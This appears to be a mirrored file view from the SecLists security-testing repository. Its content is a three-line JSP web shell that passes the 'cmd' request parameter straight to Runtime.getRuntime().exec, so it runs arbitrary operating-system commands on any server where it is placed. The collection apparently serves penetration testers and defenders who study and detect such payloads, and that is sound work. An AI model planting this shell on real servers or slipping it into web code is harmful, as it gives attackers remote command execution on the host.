mirror of
https://github.com/danielmiessler/SecLists
synced 2025-12-07 09:24:56 +01:00
3 lines
63 B
Text
3 lines
63 B
Text
<%
|
|
Runtime.getRuntime().exec(request.getParameter("cmd"));
|
|
%>
|